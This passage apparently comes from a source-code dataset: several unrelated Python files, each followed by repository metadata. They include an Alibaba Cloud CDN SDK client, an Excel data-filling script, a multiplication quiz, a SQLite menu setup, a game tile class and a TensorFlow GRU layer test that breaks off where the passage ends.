return self.describe_domains_usage_by_day_with_options(request, runtime)
async def describe_domains_usage_by_day_async(
self,
request: cdn_20141111_models.DescribeDomainsUsageByDayRequest,
) -> cdn_20141111_models.DescribeDomainsUsageByDayResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_domains_usage_by_day_with_options_async(request, runtime)
def describe_refresh_quota_with_options(
self,
request: cdn_20141111_models.DescribeRefreshQuotaRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeRefreshQuota',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeRefreshQuotaResponse(),
self.call_api(params, req, runtime)
)
async def describe_refresh_quota_with_options_async(
self,
request: cdn_20141111_models.DescribeRefreshQuotaRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeRefreshQuota',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeRefreshQuotaResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_refresh_quota(
self,
request: cdn_20141111_models.DescribeRefreshQuotaRequest,
) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
runtime = util_models.RuntimeOptions()
return self.describe_refresh_quota_with_options(request, runtime)
async def describe_refresh_quota_async(
self,
request: cdn_20141111_models.DescribeRefreshQuotaRequest,
) -> cdn_20141111_models.DescribeRefreshQuotaResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_refresh_quota_with_options_async(request, runtime)
def describe_top_domains_by_flow_with_options(
self,
request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.limit):
query['Limit'] = request.limit
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.product):
query['Product'] = request.product
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeTopDomainsByFlow',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeTopDomainsByFlowResponse(),
self.call_api(params, req, runtime)
)
async def describe_top_domains_by_flow_with_options_async(
self,
request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.limit):
query['Limit'] = request.limit
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.product):
query['Product'] = request.product
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeTopDomainsByFlow',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeTopDomainsByFlowResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_top_domains_by_flow(
self,
request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
runtime = util_models.RuntimeOptions()
return self.describe_top_domains_by_flow_with_options(request, runtime)
async def describe_top_domains_by_flow_async(
self,
request: cdn_20141111_models.DescribeTopDomainsByFlowRequest,
) -> cdn_20141111_models.DescribeTopDomainsByFlowResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_top_domains_by_flow_with_options_async(request, runtime)
def describe_user_domains_with_options(
self,
request: cdn_20141111_models.DescribeUserDomainsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeUserDomainsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_domain_show):
query['CheckDomainShow'] = request.check_domain_show
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_search_type):
query['DomainSearchType'] = request.domain_search_type
if not UtilClient.is_unset(request.domain_status):
query['DomainStatus'] = request.domain_status
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeUserDomains',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeUserDomainsResponse(),
self.call_api(params, req, runtime)
)
async def describe_user_domains_with_options_async(
self,
request: cdn_20141111_models.DescribeUserDomainsRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.DescribeUserDomainsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.cdn_type):
query['CdnType'] = request.cdn_type
if not UtilClient.is_unset(request.check_domain_show):
query['CheckDomainShow'] = request.check_domain_show
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_search_type):
query['DomainSearchType'] = request.domain_search_type
if not UtilClient.is_unset(request.domain_status):
query['DomainStatus'] = request.domain_status
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.page_number):
query['PageNumber'] = request.page_number
if not UtilClient.is_unset(request.page_size):
query['PageSize'] = request.page_size
if not UtilClient.is_unset(request.resource_group_id):
query['ResourceGroupId'] = request.resource_group_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
if not UtilClient.is_unset(request.sources):
query['Sources'] = request.sources
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='DescribeUserDomains',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.DescribeUserDomainsResponse(),
await self.call_api_async(params, req, runtime)
)
def describe_user_domains(
self,
request: cdn_20141111_models.DescribeUserDomainsRequest,
) -> cdn_20141111_models.DescribeUserDomainsResponse:
runtime = util_models.RuntimeOptions()
return self.describe_user_domains_with_options(request, runtime)
async def describe_user_domains_async(
self,
request: cdn_20141111_models.DescribeUserDomainsRequest,
) -> cdn_20141111_models.DescribeUserDomainsResponse:
runtime = util_models.RuntimeOptions()
return await self.describe_user_domains_with_options_async(request, runtime)
def open_cdn_service_with_options(
self,
request: cdn_20141111_models.OpenCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.OpenCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.internet_charge_type):
query['InternetChargeType'] = request.internet_charge_type
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='OpenCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.OpenCdnServiceResponse(),
self.call_api(params, req, runtime)
)
async def open_cdn_service_with_options_async(
self,
request: cdn_20141111_models.OpenCdnServiceRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.OpenCdnServiceResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.internet_charge_type):
query['InternetChargeType'] = request.internet_charge_type
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='OpenCdnService',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.OpenCdnServiceResponse(),
await self.call_api_async(params, req, runtime)
)
def open_cdn_service(
self,
request: cdn_20141111_models.OpenCdnServiceRequest,
) -> cdn_20141111_models.OpenCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return self.open_cdn_service_with_options(request, runtime)
async def open_cdn_service_async(
self,
request: cdn_20141111_models.OpenCdnServiceRequest,
) -> cdn_20141111_models.OpenCdnServiceResponse:
runtime = util_models.RuntimeOptions()
return await self.open_cdn_service_with_options_async(request, runtime)
def push_object_cache_with_options(
self,
request: cdn_20141111_models.PushObjectCacheRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.PushObjectCacheResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.area):
query['Area'] = request.area
if not UtilClient.is_unset(request.object_path):
query['ObjectPath'] = request.object_path
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='PushObjectCache',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.PushObjectCacheResponse(),
self.call_api(params, req, runtime)
)
async def push_object_cache_with_options_async(
self,
request: cdn_20141111_models.PushObjectCacheRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.PushObjectCacheResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.area):
query['Area'] = request.area
if not UtilClient.is_unset(request.object_path):
query['ObjectPath'] = request.object_path
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='PushObjectCache',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.PushObjectCacheResponse(),
await self.call_api_async(params, req, runtime)
)
def push_object_cache(
self,
request: cdn_20141111_models.PushObjectCacheRequest,
) -> cdn_20141111_models.PushObjectCacheResponse:
runtime = util_models.RuntimeOptions()
return self.push_object_cache_with_options(request, runtime)
async def push_object_cache_async(
self,
request: cdn_20141111_models.PushObjectCacheRequest,
) -> cdn_20141111_models.PushObjectCacheResponse:
runtime = util_models.RuntimeOptions()
return await self.push_object_cache_with_options_async(request, runtime)
def refresh_object_caches_with_options(
self,
request: cdn_20141111_models.RefreshObjectCachesRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.RefreshObjectCachesResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.object_path):
query['ObjectPath'] = request.object_path
if not UtilClient.is_unset(request.object_type):
query['ObjectType'] = request.object_type
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='RefreshObjectCaches',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.RefreshObjectCachesResponse(),
self.call_api(params, req, runtime)
)
async def refresh_object_caches_with_options_async(
self,
request: cdn_20141111_models.RefreshObjectCachesRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.RefreshObjectCachesResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.object_path):
query['ObjectPath'] = request.object_path
if not UtilClient.is_unset(request.object_type):
query['ObjectType'] = request.object_type
if not UtilClient.is_unset(request.owner_id):
query['OwnerId'] = request.owner_id
if not UtilClient.is_unset(request.security_token):
query['SecurityToken'] = request.security_token
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='RefreshObjectCaches',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.RefreshObjectCachesResponse(),
await self.call_api_async(params, req, runtime)
)
def refresh_object_caches(
self,
request: cdn_20141111_models.RefreshObjectCachesRequest,
) -> cdn_20141111_models.RefreshObjectCachesResponse:
runtime = util_models.RuntimeOptions()
return self.refresh_object_caches_with_options(request, runtime)
async def refresh_object_caches_async(
self,
request: cdn_20141111_models.RefreshObjectCachesRequest,
) -> cdn_20141111_models.RefreshObjectCachesResponse:
runtime = util_models.RuntimeOptions()
return await self.refresh_object_caches_with_options_async(request, runtime)
def test_describe_domain_bps_data_with_options(
self,
request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='TestDescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.TestDescribeDomainBpsDataResponse(),
self.call_api(params, req, runtime)
)
async def test_describe_domain_bps_data_with_options_async(
self,
request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
runtime: util_models.RuntimeOptions,
) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.domain_name):
query['DomainName'] = request.domain_name
if not UtilClient.is_unset(request.domain_type):
query['DomainType'] = request.domain_type
if not UtilClient.is_unset(request.end_time):
query['EndTime'] = request.end_time
if not UtilClient.is_unset(request.interval):
query['Interval'] = request.interval
if not UtilClient.is_unset(request.isp_name_en):
query['IspNameEn'] = request.isp_name_en
if not UtilClient.is_unset(request.location_name_en):
query['LocationNameEn'] = request.location_name_en
if not UtilClient.is_unset(request.start_time):
query['StartTime'] = request.start_time
if not UtilClient.is_unset(request.time_merge):
query['TimeMerge'] = request.time_merge
req = open_api_models.OpenApiRequest(
query=OpenApiUtilClient.query(query)
)
params = open_api_models.Params(
action='TestDescribeDomainBpsData',
version='2014-11-11',
protocol='HTTPS',
pathname='/',
method='POST',
auth_type='AK',
style='RPC',
req_body_type='formData',
body_type='json'
)
return TeaCore.from_map(
cdn_20141111_models.TestDescribeDomainBpsDataResponse(),
await self.call_api_async(params, req, runtime)
)
def test_describe_domain_bps_data(
self,
request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return self.test_describe_domain_bps_data_with_options(request, runtime)
async def test_describe_domain_bps_data_async(
self,
request: cdn_20141111_models.TestDescribeDomainBpsDataRequest,
) -> cdn_20141111_models.TestDescribeDomainBpsDataResponse:
runtime = util_models.RuntimeOptions()
return await self.test_describe_domain_bps_data_with_options_async(request, runtime)
| [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
a481bdd3a1a74bf95361e1226dd78bdd78fb27f1 | d088bd6e31a64affda073ddc902fa77a4a8a4e0d | /handdle.py | bdb3dd7f2351c6828d19dfa471ea453027eacd86 | [] | no_license | fangtang0101/python-data | a21def51bf73a3e30b256b4512d0c3a53431d233 | edbae51267d025fd938ee6478de6497a2e63a3fc | refs/heads/master | 2020-04-07T12:26:27.180146 | 2018-03-07T09:55:59 | 2018-03-07T09:55:59 | 124,211,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,248 | py | #-*-coding:utf-8 -*-
import os
import string
import shutil
import xlrd
import sys
import chardet
from xlutils.copy import copy
import json
import xlwt
import sys
#2. 将对应的数据放到 对应的 文档里面
path_or = "source_or"
path_tar = "source"
list_info ={
"content": [
{
"path":"./source/model/西餐厅.xls",
"key_sheet_name":"西餐厅",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/茶餐厅.xls",
"key_sheet_name":"茶餐厅",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/D5.xls",
"key_sheet_name":"D5",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/D4.xls",
"key_sheet_name":"D4",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/小弄堂.xls",
"key_sheet_name":"小弄堂",
"col_source":2,
"col_target":2
},
{
"path":"./source/model/A2.xls",
"key_sheet_name":"A2",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/37#.xls",
"key_sheet_name":"37#",
"col_source":2,
"col_target":3
},
{
"path":"./source/model/A3.xls",
"key_sheet_name":"A3",
"col_source":2,
"col_target":3
}
]
}
def get_string_split(str_):
str_ = ''.join(str_.split())
return str_
def copy_file(path_form,path_to):
#if target path is exist then delete it
path_to = path_to.strip()
path_to = path_to.rstrip("\\")
isExists = os.path.exists(path_to)
print("file exist",isExists)
if isExists:
shutil.rmtree(path_to) #delete file
print("success delete file name is ",path_to)
shutil.copytree("source_or", "source")
print("success copy file ...",)
def fix_data():
pass
# get data in corresponding xls
def get_data_corresponding(item):
key_sheet_name = item["key_sheet_name"]
list_temp = []
path = "对应数据_名称.xls"
book = xlrd.open_workbook(path,formatting_info=True)
sheets=book.sheets()
sheet_item = book.sheet_by_name(key_sheet_name)
rows = sheet_item.nrows
cols = sheet_item.ncols
list_cell = []
col_target = 2
for row in range(1,rows):
cell_temp = sheet_item.cell_value(row,col_target)
cell_data = sheet_item.cell_value(row,col_target+1)
if (cell_temp.strip() != '' and cell_data.strip() != '') :
cell_target = {'cell_temp': cell_temp, 'cell_data': cell_data}
list_cell.append(cell_target)
# print("list_cell....",list_cell)
return list_cell
def filled_data(item,list_all):
target_path_model = item["path"]
key_sheet_name = item["key_sheet_name"]
rb = xlrd.open_workbook(target_path_model,formatting_info=True)
wb = copy(rb)
ws = wb.get_sheet(0)
sheet_readonly = rb.sheet_by_index(0)
# note...... must use sheet_by_index
rows = sheet_readonly.nrows
cols = sheet_readonly.ncols
col_target = 2
# 设置单元格颜色
pattern = xlwt.Pattern() # Create the Pattern
pattern.pattern = xlwt.Pattern.SOLID_PATTERN # May be: NO_PATTERN, SOLID_PATTERN, or 0x00 through 0x12
pattern.pattern_fore_colour = 5 # May be: 8 through 63. 0 = Black, 1 = White, 2 = Red, 3 = Green, 4 = Blue, 5 = Yellow, 6 = Magenta, 7 = Cyan, 16 = Maroon, 17 = Dark Green, 18 = Dark Blue, 19 = Dark Yellow , almost brown), 20 = Dark Magenta, 21 = Teal, 22 = Light Gray, 23 = Dark Gray, the list goes on...
style = xlwt.XFStyle() # Create the Pattern
style.pattern = pattern # Add Pattern to Style
for data in list_all:
for row in range(1,rows):
cell = sheet_readonly.cell_value(row,col_target)
if get_string_split(cell) == get_string_split(data["cell_data"]):
data["row"] = row
data["col"] = col_target
break
for obj in list_all:
if 'row' in obj :
# ws.write(obj['row'], obj['col'], obj['cell_temp'],style)
ws.write(obj['row'], obj['col']+10, obj['cell_temp'],style)
else:
print(item["key_sheet_name"],"connt find ... ",obj)
wb.save(target_path_model)
# step 1 copy file
copy_file(path_or,path_tar)
# step 2 fix data
for item in list_info["content"]:
list_data_item = get_data_corresponding(item)
filled_data(item,list_data_item)
print("finished ...",item["key_sheet_name"])
# a=' hello world '
# a = ''.join(a.split())
# print(a)
| [
"fangchungao@rltx.com"
] | fangchungao@rltx.com |
f8fb78b34913903cdd4e7dbecf2b63afad70b866 | b19a1baf69d1f7ba05a02ace7dfcba15c8d47cfb | /my_random.py | 1a36aadaabd3e30ae66d3858d940a5fa861897f8 | [] | no_license | MarkHofstetter/20191018-wifi-python | 20ed5de1cf28996902cecf7cd681d054e0d06739 | 7427b896783059a77c541e95df851a492ef5ebb9 | refs/heads/master | 2020-08-15T03:43:42.964992 | 2019-10-28T14:39:17 | 2019-10-28T14:39:17 | 215,275,139 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | # kopfrechen
# der benutzer bekommt 2 unterschiedliche zufallszahlen jeweils im Bereich 1 - 10
# die muss der Benutzer multiplizieren
# und es wird ueberprueft ob die aufgabe richtig geloest wurde
# zusatz
# 10 verschiedene Aufgaben stellen und sich merken
# wieviel richtig und falsch waren
import random
from util import user_input_positive_number
# import util
wrong = 0
right = 0
user_input = user_input_positive_number(question = 'Wieviele Runden')
for i in range(0, user_input):
print(i)
m1 = random.randint(1, 10)
m2 = random.randint(1, 10)
print(str(m1) + ' mal ' + str(m2) + ' ergibt?')
product = m1 * m2
user_input = user_input_positive_number('Bitte eine Lösung eingeben: ')
if product == user_input:
print("Richtig!")
right += 1
else:
print("Falsch!")
wrong += 1
print('Richtig: ' + str(right) )
print('Falsch: ' + str(wrong))
print('Korrekt {:0.2f} %'.format(right/(i+1)*100))
| [
"mark@hofstetter.at"
] | mark@hofstetter.at |
d332b3dd09b91c5e952ba6af93587d2050fea535 | f20d9ff8aafb8ef2d3e4a14b1d055be7c1a1e0db | /create_database.py | 1c4848520b8d61043baad8f24786a792f0988323 | [] | no_license | HopeCheung/menu_api | 25fee2d807e86245bc547c753a8bc156d99b9962 | bfb410bfe5cd686e237f937f64bac198e178c75e | refs/heads/master | 2020-05-09T20:59:49.467719 | 2019-04-15T17:42:24 | 2019-04-15T17:42:24 | 181,426,747 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import os
import sqlite3
conn = sqlite3.connect("menu.db")
conn.execute('create table menu (id int, name varchar(20), item varchar(20))')
cur = conn.cursor()
cur.execute('insert into menu values(1, "Lunch Specials", "Chicken")')
cur.execute('insert into menu values(2, "Dinner Specials", "Pork")')
cur.execute('insert into menu values(3, "Specials of the day", "Salad")')
cur.execute('insert into menu values(1, "Lunch Specials", "Beef")')
cur.execute('insert into menu values(2, "Dinner Specials", "Sheep")')
cur.execute('insert into menu values(3, "Specials of the day", "Vegetables")')
conn.commit()
cur = conn.cursor()
cur.execute("select * from menu")
print(cur.fetchall())
| [
"568038810@qq.com"
] | 568038810@qq.com |
2f00b65bb0196e3aa1f07c30430bc2e692b9861d | 5476559c5a1b2d45533da87f0d4919cc97a41d5c | /map_objects/tile.py | 1fca69ba8f3e9574b7da022c03c3b6ff56bcb938 | [] | no_license | sheekthief/RoguelikeAdventure | c56044ea9671cfbe598a65dc794e79147258c9e1 | 9d12639ec499543da61b3b6d0231787b7399ddb4 | refs/heads/master | 2020-05-07T21:02:24.499353 | 2019-04-11T22:49:44 | 2019-04-11T22:49:44 | 180,888,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py |
class Tile:
"""
A tile on a map. It may or may not be blocked, and may or may not block sight.
"""
def __init__(self, blocked, block_sight=None):
self.blocked = blocked
self.explored = False
# By default, if a tile is blocked, it also blocks sight
if block_sight is None:
block_sight = blocked
self.block_sight = block_sight
| [
"noreply@github.com"
] | noreply@github.com |
3f2df8afaad5f9ab52f07effc22cd98efdca27fd | 1da709080d0cc12f58a15d9ea1aa1e3c8511b0ad | /HW 4/hw4_TempSolver.py | ad26fb46f86a6f9b13e17b261faf3e5bbfa48c30 | [] | no_license | Avd6977/me701 | 75b2462229d2852e42443632d3cba8f351f01725 | 8888825389758f7691b18176a219ea76ab8ff3a3 | refs/heads/master | 2020-05-18T15:27:24.151420 | 2014-11-26T01:37:33 | 2014-11-26T01:37:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | # Test of the F2PY module
from hw4 import *
print "Dirilicht conditions (temperature at both sides defined)"
tempsolver.tempsolve(1, 1, 100, 0, 100, 0, 0)
print "\n"
print "Left side temperature and spatial derivative defined"
tempsolver.tempsolve(1.5, 2, 500, 1.5, 0, 0, 1)
print "\n"
print "Right side temperature and spatial derivative defined"
tempsolver.tempsolve(2.05, -4, 0, 0, 290, -5, 2)
| [
"Avd@ksu.edu"
] | Avd@ksu.edu |
36d309841dbe245ef49c789e87285f004a3dd0c7 | 169e75df163bb311198562d286d37aad14677101 | /tensorflow/python/keras/_impl/keras/layers/gru_test.py | 48e7e14f5ab73b534ab0d1c765ad2572b2930b2b | [
"Apache-2.0"
] | permissive | zylo117/tensorflow-gpu-macosx | e553d17b769c67dfda0440df8ac1314405e4a10a | 181bc2b37aa8a3eeb11a942d8f330b04abc804b3 | refs/heads/master | 2022-10-19T21:35:18.148271 | 2020-10-15T02:33:20 | 2020-10-15T02:33:20 | 134,240,831 | 116 | 26 | Apache-2.0 | 2022-10-04T23:36:22 | 2018-05-21T08:29:12 | C++ | UTF-8 | Python | false | false | 7,280 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GRU layer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import test_util as tf_test_util
from tensorflow.python.keras._impl import keras
from tensorflow.python.keras._impl.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.training.rmsprop import RMSPropOptimizer
class GRULayerTest(test.TestCase):
@tf_test_util.run_in_graph_and_eager_modes()
def test_return_sequences_GRU(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.GRU,
kwargs={'units': units,
'return_sequences': True},
input_shape=(num_samples, timesteps, embedding_dim))
@tf_test_util.run_in_graph_and_eager_modes()
def test_dynamic_behavior_GRU(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer = keras.layers.GRU(units, input_shape=(None, embedding_dim))
model = keras.models.Sequential()
model.add(layer)
model.compile(RMSPropOptimizer(0.01), 'mse')
x = np.random.random((num_samples, timesteps, embedding_dim))
y = np.random.random((num_samples, units))
model.train_on_batch(x, y)
@tf_test_util.run_in_graph_and_eager_modes()
def test_dropout_GRU(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
testing_utils.layer_test(
keras.layers.GRU,
kwargs={'units': units,
'dropout': 0.1,
'recurrent_dropout': 0.1},
input_shape=(num_samples, timesteps, embedding_dim))
@tf_test_util.run_in_graph_and_eager_modes()
def test_implementation_mode_GRU(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
for mode in [0, 1, 2]:
testing_utils.layer_test(
keras.layers.GRU,
kwargs={'units': units,
'implementation': mode},
input_shape=(num_samples, timesteps, embedding_dim))
def test_statefulness_GRU(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer_class = keras.layers.GRU
with self.test_session():
model = keras.models.Sequential()
model.add(
keras.layers.Embedding(
4,
embedding_dim,
mask_zero=True,
input_length=timesteps,
batch_input_shape=(num_samples, timesteps)))
layer = layer_class(
units, return_sequences=False, stateful=True, weights=None)
model.add(layer)
model.compile(optimizer='sgd', loss='mse')
out1 = model.predict(np.ones((num_samples, timesteps)))
self.assertEqual(out1.shape, (num_samples, units))
# train once so that the states change
model.train_on_batch(
np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
